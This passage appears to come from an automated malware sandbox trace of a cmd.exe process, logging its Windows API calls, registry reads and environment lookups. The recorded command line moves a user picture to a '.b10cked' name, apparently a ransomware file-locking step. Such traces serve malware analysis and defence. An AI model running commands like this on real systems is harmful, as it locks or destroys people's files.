\"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\user.bmp.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 28513 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 28514 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 28515 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 28516 start_va = 0x130000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 28517 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 28518 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 28519 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 28520 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 28521 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 28522 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 28553 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 28554 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 28555 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 28556 start_va = 0x2f0000 end_va = 0x2fffff entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 28557 start_va = 0x3d0000 end_va = 0x4cffff entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 28558 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 28559 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 28560 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 28561 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 28562 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 28563 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 28564 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 28565 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 28566 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 28567 start_va = 0x300000 end_va = 0x3c7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000300000" filename = "" Region: id = 28568 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 28569 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 28570 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 28571 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 28572 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 28573 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 28574 start_va = 0x4d0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 28575 start_va = 0x5e0000 end_va = 0x11dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005e0000" filename = "" Region: id = 28576 start_va = 0x11e0000 end_va = 0x1342fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011e0000" filename = "" Thread: id = 633 os_tid = 0xa64 [0193.806] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x22fefc | out: lpSystemTimeAsFileTime=0x22fefc*(dwLowDateTime=0xa863a3e0, dwHighDateTime=0x1d440a9)) [0193.806] GetCurrentProcessId () returned 0xd40 [0193.806] GetCurrentThreadId () returned 0xa64 [0193.806] GetTickCount () returned 0x370cb [0193.806] QueryPerformanceCounter (in: lpPerformanceCount=0x22fef4 | out: lpPerformanceCount=0x22fef4*=25059568732) returned 1 [0193.807] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0193.807] __set_app_type (_Type=0x1) [0193.807] __p__fmode () returned 0x76b331f4 [0193.807] __p__commode () returned 0x76b331fc [0193.807] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0193.807] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0193.807] GetCurrentThreadId () returned 0xa64 [0193.807] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xa64) returned 0x38 [0193.808] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0193.808] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0193.808] SetThreadUILanguage (LangId=0x0) returned 0x409 [0193.808] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0193.808] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x22fe8c | out: phkResult=0x22fe8c*=0x0) returned 0x2 [0193.808] VirtualQuery (in: lpAddress=0x22fec3, lpBuffer=0x22fe5c, dwLength=0x1c | out: lpBuffer=0x22fe5c*(BaseAddress=0x22f000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0193.808] VirtualQuery (in: lpAddress=0x130000, lpBuffer=0x22fe5c, dwLength=0x1c | out: lpBuffer=0x22fe5c*(BaseAddress=0x130000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0193.808] VirtualQuery (in: lpAddress=0x131000, lpBuffer=0x22fe5c, dwLength=0x1c | out: lpBuffer=0x22fe5c*(BaseAddress=0x131000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0193.808] VirtualQuery (in: lpAddress=0x133000, lpBuffer=0x22fe5c, dwLength=0x1c | out: lpBuffer=0x22fe5c*(BaseAddress=0x133000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0193.808] VirtualQuery (in: lpAddress=0x230000, lpBuffer=0x22fe5c, dwLength=0x1c | out: lpBuffer=0x22fe5c*(BaseAddress=0x230000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0xc0000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0193.808] GetConsoleOutputCP () returned 0x1b5 [0193.808] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0193.808] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0193.808] _get_osfhandle (_FileHandle=1) returned 0x7 [0193.808] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0193.808] _get_osfhandle (_FileHandle=1) returned 0x7 [0193.809] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0193.809] _get_osfhandle (_FileHandle=1) returned 0x7 [0193.809] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0193.809] _get_osfhandle (_FileHandle=0) returned 0x3 [0193.809] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0193.809] _get_osfhandle (_FileHandle=0) returned 0x3 [0193.809] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0193.809] GetEnvironmentStringsW () returned 0x3e0180* [0193.809] FreeEnvironmentStringsW (penv=0x3e0180) returned 1 [0193.809] GetEnvironmentStringsW () returned 0x3e0180* [0193.810] FreeEnvironmentStringsW (penv=0x3e0180) returned 1 [0193.810] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x22edfc | out: phkResult=0x22edfc*=0x40) returned 0x0 [0193.810] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x22ee04, lpData=0x22ee08, lpcbData=0x22ee00*=0x1000 | out: lpType=0x22ee04*=0x0, lpData=0x22ee08*=0xa8, lpcbData=0x22ee00*=0x1000) returned 0x2 [0193.810] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x22ee04, lpData=0x22ee08, lpcbData=0x22ee00*=0x1000 | out: lpType=0x22ee04*=0x4, lpData=0x22ee08*=0x1, lpcbData=0x22ee00*=0x4) returned 0x0 [0193.810] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x22ee04, lpData=0x22ee08, lpcbData=0x22ee00*=0x1000 | out: lpType=0x22ee04*=0x0, lpData=0x22ee08*=0x1, lpcbData=0x22ee00*=0x1000) returned 0x2 [0193.810] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x22ee04, lpData=0x22ee08, lpcbData=0x22ee00*=0x1000 | out: lpType=0x22ee04*=0x4, lpData=0x22ee08*=0x0, lpcbData=0x22ee00*=0x4) returned 0x0 [0193.810] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x22ee04, lpData=0x22ee08, lpcbData=0x22ee00*=0x1000 | out: lpType=0x22ee04*=0x4, lpData=0x22ee08*=0x40, lpcbData=0x22ee00*=0x4) returned 0x0 [0193.810] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x22ee04, lpData=0x22ee08, lpcbData=0x22ee00*=0x1000 | out: lpType=0x22ee04*=0x4, lpData=0x22ee08*=0x40, lpcbData=0x22ee00*=0x4) returned 0x0 [0193.810] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x22ee04, lpData=0x22ee08, lpcbData=0x22ee00*=0x1000 | out: lpType=0x22ee04*=0x0, lpData=0x22ee08*=0x40, lpcbData=0x22ee00*=0x1000) returned 0x2 [0193.810] RegCloseKey (hKey=0x40) returned 0x0 [0193.810] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x22edfc | out: phkResult=0x22edfc*=0x40) returned 0x0 [0193.810] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x22ee04, lpData=0x22ee08, lpcbData=0x22ee00*=0x1000 | out: lpType=0x22ee04*=0x0, lpData=0x22ee08*=0x40, lpcbData=0x22ee00*=0x1000) returned 0x2 [0193.810] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x22ee04, lpData=0x22ee08, lpcbData=0x22ee00*=0x1000 | out: lpType=0x22ee04*=0x4, lpData=0x22ee08*=0x1, lpcbData=0x22ee00*=0x4) returned 0x0 [0193.810] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x22ee04, lpData=0x22ee08, lpcbData=0x22ee00*=0x1000 | out: lpType=0x22ee04*=0x0, lpData=0x22ee08*=0x1, lpcbData=0x22ee00*=0x1000) returned 0x2 [0193.810] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x22ee04, lpData=0x22ee08, lpcbData=0x22ee00*=0x1000 | out: lpType=0x22ee04*=0x4, lpData=0x22ee08*=0x0, lpcbData=0x22ee00*=0x4) returned 0x0 [0193.810] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x22ee04, lpData=0x22ee08, lpcbData=0x22ee00*=0x1000 | out: lpType=0x22ee04*=0x4, lpData=0x22ee08*=0x9, lpcbData=0x22ee00*=0x4) returned 0x0 [0193.810] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x22ee04, lpData=0x22ee08, lpcbData=0x22ee00*=0x1000 | out: lpType=0x22ee04*=0x4, lpData=0x22ee08*=0x9, lpcbData=0x22ee00*=0x4) returned 0x0 [0193.810] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x22ee04, lpData=0x22ee08, lpcbData=0x22ee00*=0x1000 | out: lpType=0x22ee04*=0x0, lpData=0x22ee08*=0x9, lpcbData=0x22ee00*=0x1000) returned 0x2 [0193.810] RegCloseKey (hKey=0x40) returned 0x0 [0193.810] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88639b [0193.810] srand (_Seed=0x5b88639b) [0193.810] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\user.bmp\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\user.bmp.b10cked\"" [0193.811] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\user.bmp\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\user.bmp.b10cked\"" [0193.811] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0193.811] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3e18e0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0193.811] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0193.811] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0193.811] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0193.811] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0193.811] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0193.811] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0193.812] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0193.812] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0193.812] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0193.812] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0193.812] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0193.812] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0193.812] GetEnvironmentStringsW () returned 0x3e22d0* [0193.812] FreeEnvironmentStringsW (penv=0x3e22d0) returned 1 [0193.812] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0193.812] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0193.812] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0193.812] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0193.812] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0193.812] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0193.812] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0193.812] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0193.812] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0193.812] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0193.812] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x22fbc8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0193.812] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x22fbc8, lpFilePart=0x22fbc4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x22fbc4*="Desktop") returned 0x18 [0193.812] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0193.813] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x22f944 | out: lpFindFileData=0x22f944) returned 0x3e0010 [0193.813] FindClose (in: hFindFile=0x3e0010 | out: hFindFile=0x3e0010) returned 1 [0193.813] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x22f944 | out: lpFindFileData=0x22f944) returned 0x3e0010 [0193.813] FindClose (in: hFindFile=0x3e0010 | out: hFindFile=0x3e0010) returned 1 [0193.813] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x22f944 | out: lpFindFileData=0x22f944) returned 0x3e0010 [0193.813] FindClose (in: hFindFile=0x3e0010 | out: hFindFile=0x3e0010) returned 1 [0193.813] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0193.813] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0193.813] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0193.814] GetEnvironmentStringsW () returned 0x3e2af0* [0193.814] FreeEnvironmentStringsW (penv=0x3e2af0) returned 1 [0193.814] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0193.814] GetConsoleOutputCP () returned 0x1b5 [0193.815] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0193.815] GetUserDefaultLCID () returned 0x409 [0193.815] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0193.815] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x22fd08, cchData=128 | out: lpLCData="0") returned 2 [0193.815] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x22fd08, cchData=128 | out: lpLCData="0") returned 2 [0193.815] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x22fd08, cchData=128 | out: lpLCData="1") returned 2 [0193.815] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0193.815] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0193.815] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0193.815] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0193.815] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0193.815] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0193.816] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0193.816] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0193.816] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0193.816] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0193.816] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0193.817] GetConsoleTitleW (in: lpConsoleTitle=0x3d08e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0193.817] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0193.817] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0193.817] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0193.817] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0193.818] _wcsicmp (_String1="move", _String2=")") returned 68 [0193.818] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0193.818] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0193.818] _wcsicmp (_String1="IF", _String2="move") returned -4 [0193.818] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0193.818] _wcsicmp (_String1="REM", _String2="move") returned 5 [0193.818] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0193.820] GetConsoleTitleW (in: lpConsoleTitle=0x22fa00, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0193.821] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0193.821] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0193.821] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0193.821] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0193.821] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0193.821] _wcsicmp (_String1="move", _String2="CD") returned 10 [0193.821] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0193.821] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0193.821] _wcsicmp (_String1="move", _String2="REN") returned -5 [0193.821] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0193.821] _wcsicmp (_String1="move", _String2="SET") returned -6 [0193.821] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0193.821] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0193.821] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0193.821] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0193.821] _wcsicmp (_String1="move", _String2="MD") returned 11 [0193.821] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0193.821] _wcsicmp (_String1="move", _String2="RD") returned -5 [0193.821] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0193.821] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0193.821] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0193.821] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0193.821] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0193.821] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0193.821] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0193.821] _wcsicmp (_String1="move", _String2="VER") returned -9 [0193.821] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0193.821] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0193.821] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0193.821] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0193.821] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0193.821] _wcsicmp (_String1="move", _String2="START") returned -6 [0193.821] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0193.821] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0193.821] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0193.823] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0193.823] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0193.823] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x22f7bc, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x22f7b4, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x22f7b4*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0193.823] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0193.823] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0193.823] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0193.823] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0193.824] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0193.824] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0193.824] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0193.824] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0193.824] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0193.824] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0193.824] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0193.824] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0193.824] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0193.824] 